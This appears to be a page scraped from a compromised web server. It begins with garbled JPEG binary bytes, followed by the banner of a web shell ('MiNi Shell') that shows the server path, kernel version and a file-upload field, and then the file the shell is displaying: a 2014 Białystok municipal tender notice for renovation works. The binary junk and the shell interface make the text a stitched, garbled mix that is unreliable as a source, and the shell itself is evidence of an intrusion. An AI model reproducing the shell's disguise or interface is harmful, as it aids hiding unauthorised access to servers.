JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140319/93460-N-2014.html

<p class="kh_header"><b>Białystok: Wykonanie robót remontowych w zasobach Zarządu Mienia Komunalnego 
w Białymstoku część V, VI,VII</b><br>
<b>Numer ogłoszenia: 93460 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych w zasobach Zarządu Mienia Komunalnego 
w Białymstoku część V, VI,VII.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót remontowych  w  zasobach  Zarządu Mienia Komunalnego w Białymstoku, (część V,VI,VII), tj.:
Zadanie nr 1 
Remont pomieszczenia w.c. nr 21 na  parterze  budynku  przychodni przy ul. Siewnej 2  
w  Białymstoku.
Zadanie nr 2
Remont instalacji elektrycznej w lokalu mieszkalnym   przy ul. Przędzalnianej 4B m.25 
w Białymstoku.  
Zadanie nr 3 
Wymiana stolarki okiennej w lokalach mieszkalnych przy ul. Rzymowskiego 40 
w Białymstoku.
Zadanie nr 4 
Remont lokalu mieszkalnego przed zasiedleniem przy ul. Dojnowskiej 80A m.34 
w Białymstoku.
Zadanie nr 5 
Wymiana stolarki okiennej w lokalu mieszkalnym przy ul. Bema 89A m.47, ul. Bema 89C m.58, ul. Bema 91 m.55, ul. Bema 93 m.2, ul. Bema 95 m.21, ul. Bema 101 m.71, ul. Kopernika 7 m.18, ul. Wiejska 4B m.61, ul. Klepacka 2D m.4 w Białymstoku.
Zadanie nr 6 
Remont klatki schodowej III po pożarze w budynku mieszkalnym przy ul. Barszczańskiej 6 w Białymstoku. Wymiana okien i uzupełnienie skrzydła drzwiowego na klatce schodowej II na I piętrze w budynku mieszkalnym przy ul. Barszczańskiej 10 w Białymstoku.
Zadanie nr 7
Remont instalacji elektrycznej w lokalu mieszkalnym   przy ul. Broniewskiego 19 m.14, Tuwima 1/1 m.61, Tuwima 1/3 m.56, Tuwima 1/1 m.3 i ul. Sobieskiego 2 m.3 
w Białymstoku.  
Zadanie nr 8 
Wymiana stolarki okiennej w lokalach użytkowych przy ul. Kilińskiego 10  
w Białymstoku.
Zadanie nr 9 
Wymiana stolarki okiennej w lokalach mieszkalnym  nr 2A i 3 oraz drzwi wejściowych do budynku przy ul. Świętojańskiej   26 w Białymstoku.
Zadanie nr 10
Naprawa elewacji po pożarze budynków mieszkalnych przy ul. Barszczańskiej 4 i 8 
w Białymstoku.
Zadanie 11
Wymiana stolarki okiennej w lokalu mieszkalnym  przy ul. Białówny 2m.12 w Białymstoku.

- zgodnie z dokumentacją (szkice, rysunki, opis robót, przedmiary) i specyfikacjami technicznymi wykonania i odbioru robót. Szczegółowy opis przedmiotu zamówienia został podany w załączniku nr 1 do SIWZ Opis przedmiotu zamówienia.

2.	Podane w dokumentacji projektowej nazwy lub typy materiałów i produktów mają na celu wskazanie parametrów jakościowych. W przypadku materiałów i produktów określonych w dokumentacji projektowej nazwą producenta, Zamawiający dopuszcza zastosowanie materiałów równoważnych, 
o parametrach nie niższych niż materiałów wskazanych nazwą. 
3.	Przedmiot zamówienia został podzielony na 11 zadań (części zamówienia). Zamawiający
dopuszcza złożenie oferty częściowej na jedno, kilka wybranych lub całość przedmiotu
zamówienia obejmujący zadania od nr 1 do nr 11.
4.	Wymaga  się  udzielenia:
1)	co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty wraz z materiałami dla zadania nr 1,
2)	co najmniej 12 miesięcznej gwarancji i rękojmi na wykonane roboty wraz z materiałami dla zadania nr 2,
3)	co najmniej 60 miesięcznej gwarancji i rękojmi na wymienioną stolarkę oraz co najmniej 12 miesięcznej gwarancji i rękojmi na pozostałe wykonane roboty wraz z materiałami dla zadania nr 3,
4)	co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty wraz z materiałami dla zadania nr 4,
5)	co najmniej 60 miesięcznej gwarancji i rękojmi na wymienioną stolarkę oraz co najmniej 12 miesięcznej gwarancji i rękojmi na pozostałe wykonane roboty wraz z materiałami dla zadania nr 5,
6)	co najmniej 60 miesięcznej gwarancji i rękojmi na wymienioną stolarkę oraz co najmniej 12 miesięcznej gwarancji i rękojmi na pozostałe wykonane roboty wraz z materiałami dla zadania nr 6,
7)	co najmniej 12 miesięcznej gwarancji i rękojmi na wykonane roboty wraz z materiałami dla zadania nr 7,
8)	co najmniej 60 miesięcznej gwarancji i rękojmi na wymienioną stolarkę oraz co najmniej 12 miesięcznej gwarancji i rękojmi na pozostałe wykonane roboty wraz z materiałami dla zadania nr 8,
9)	co najmniej 60 miesięcznej gwarancji i rękojmi na wymienioną stolarkę oraz co najmniej 12 miesięcznej gwarancji i rękojmi na pozostałe wykonane roboty wraz z materiałami dla zadania nr 9,
10)	co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty wraz z materiałami dla zadania nr 10,
11)	co najmniej 60 miesięcznej gwarancji i rękojmi na wymienioną stolarkę oraz co najmniej 12 miesięcznej gwarancji i rękojmi na pozostałe wykonane roboty wraz z materiałami dla zadania nr 11.

5.	W celu prawidłowego sporządzenia oferty wskazane jest, aby wykonawca dokonał wizji lokalnej oraz uzyskał wszystkie niezbędne informacje, co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.00-5, 45.44.21.00-8, 45.33.20.00-3, 45.31.11.00-0, 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4, 45.21.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał w niniejszym postępowaniu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania od nr 1 do nr 11
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania od nr 1 do nr 11
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania od nr 1 do nr 11
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania nr 2
Wykonawca winien wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj.:
a)	osobą posiadającą uprawnienia do kierowania robotami  budowlanej w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych,
UWAGA! 
Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).
Dotyczy zadania  nr 1 oraz od 3 do nr 11
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca 	potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania od nr 1 do nr 11
Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, który wykazuje spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów:
1)	wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp). 
2)	Uwaga! Pisemne zobowiązanie podmiotu trzeciego należy złożyć w formie oryginału lub notarialnie poświadczonej kopii. Treść pisemnego zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonywane, w tym jakiego okresu dotyczy.
6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w rozdziale IX SIWZ 
pkt 3 ppkt 2 - tj.: aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji 
o działalności gospodarczej,
2)	dokumenty określone w rozdziale IX SIWZ pkt 2 ppkt 1 i 2 winien złożyć co najmniej jeden 
z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale IX SIWZ pkt 1, oświadczenie o niepodleganiu wykluczeniu określone w rozdziale IX SIWZ pkt 3 ppkt 1 oraz oświadczenie z art. 26 ust. 2d ustawy Pzp określonego w rozdziale IX SIWZ pkt 7 ppkt 4 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu 
(w miejscu nazwa i adres  wykonawcy należy wpisać dane dotyczące poszczególnych członków konsorcjum lub spółki cywilnej) bądź każdy z wykonawców oddzielnie.
7.	Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ,
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp,
3)	na podstawie art. 26 ust. 2b ustawy Pzp wykonawca składa pisemne zobowiązanie podmiotu trzeciego - w przypadku gdy podmiot trzeci udostępni osoby zdolne do wykonania zamówienia,
4)	na podstawie art. 26 ust. 2d ustawy Pzp wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp albo informację o tym, że nie należy do tej grupy kapitałowej. Informację, iż wykonawca nie należy do tej samej grupy kapitałowej należy złożyć zgodnie z załącznikiem nr 4 do SIWZ (przepis art. 26 ust. 3 i 4 ustawy Pzp stosuje).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANA UMOWY 
§ 12
1.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych.
2.	Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy, w następującym zakresie i okolicznościach:
1)	strony dopuszczają możliwość przedłużenia terminu, o których mowa w § 3 ust. 1 o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy  następujących przypadkach:
a)	wystąpienia zamówień dodatkowych, których wykonanie wiąże się z koniecznością wydłużenia czasu realizacji zamówienia - warunki określono szczegółowo w § 5,  
b)	działaniem siły wyższej, tzn. zdarzenia nagłego, nieprzewidzianego i niezależnego od woli stron, uniemożliwiającego wykonanie umowy w całości lub części (np. powódź, huragan, pożar),
c)	wystąpienie szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie ze sztuką budowlaną i wiedzą techniczną,
d)	przerwania lub zawieszenia robót przez Zamawiającego z przyczyn niezawinionych przez Wykonawcę,
e)	opóźnień spowodowanych niewykonaniem przez Zamawiającego zobowiązań dotyczących terminu przekazania placu budowy, dokumentów koniecznych do realizacji zamówienia, dokumentacji zamiennej,
2)	zmiany wysokości wynagrodzenia, którym mowa w § 4 ust. 1: 
a)	poprzez zmniejszenie zakresu zamówienia oraz robót zamiennych - warunki określono szczegółowo w § 6,  
b)	w przypadku zmiany stawki VAT,
3)	zmiany obowiązujących przepisów prawa,
4)	zamawiający może dokonać zmiany swoich przedstawicieli wykazanych w § 11 ust. 2,
5)	wykonawca może dokonać zmiany swojego przedstawiciela wykazanych w § 11 ust. 1,
6)		zmiany Podwykonawcy robót, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę oraz spełnieniem przez nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
3.	Warunkiem dokonania zmiany, o której mowa w ust. 2, jest zgoda na jej dokonanie wyrażona przez obie strony oraz złożenie uzasadnionego wniosku przez stronę inicjującą zmianę lub sporządzenie przez strony stosownego protokołu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, pokój 111..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2014 godzina 10:00, miejsce: Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, sekretariat, pokój 201..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 
Remont pomieszczenia w.c. nr 21 na  parterze  budynku  przychodni przy ul. Siewnej 2  
w  Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 1
REMONT POMIESZCZENIA  W.C. NR. 21 NA  PARTERZE  BUDYNKU  PRZYCHODNI PRZY UL. SIEWNEJ 2    W  BIAŁYMSTOKU.
        Branża budowlana
  1. Opis robót , rysunki-szkice -zał.3.1a
       2. Przedmiar  robót - zał. 1.2 a
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót (Br. Bud.) - zał.1.3a
Branża sanitarna
  1. Opis robót  -zał. 1.1 b
       2. Przedmiar  robót - zał. 1.2b
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. san.) - zał. 1.3b.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.00-5, 45.44.21.00-8, 45.33.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE 2 
WYKONANIE REMONTU  INSTALACJI ELEKTRYCZNEJ W MIESZKANIU PRZY UL. PRZĘDZALNIANEJ 4B m 25   W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2 
WYKONANIE REMONTU  INSTALACJI ELEKTRYCZNEJ W MIESZKANIU PRZY UL. PRZĘDZALNIANEJ 4B m 25   W  BIAŁYMSTOKU.
Branża elektryczna 
  1. Opis przedmiotu zamówienia-+ szkice 2szt -  zał..2.1
       2. Przedmiar  robót - zał. 2.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Elektr.) - zał. 2.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE 3 
WYMIANA STOLARKI OKIENNEJ W LOKALACH MIESZKALNYCH                W BUDYNKU PRZY     UL. Rzymowskiego  40 W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3 
WYMIANA STOLARKI OKIENNEJ W LOKALACH MIESZKALNYCH                W BUDYNKU PRZY     UL. RZ W  BIAŁYMSTOKU.
        Branża budowlana
  1. Opis robót -zał.3.1
       2. Przedmiar  robót - zał. 3.2 
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Bud.) - zał. 3.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 
Remont lokalu mieszkalnego przed zasiedleniem przy ul. Dojnowskiej 80A m.34 w Białymstoku..</p>
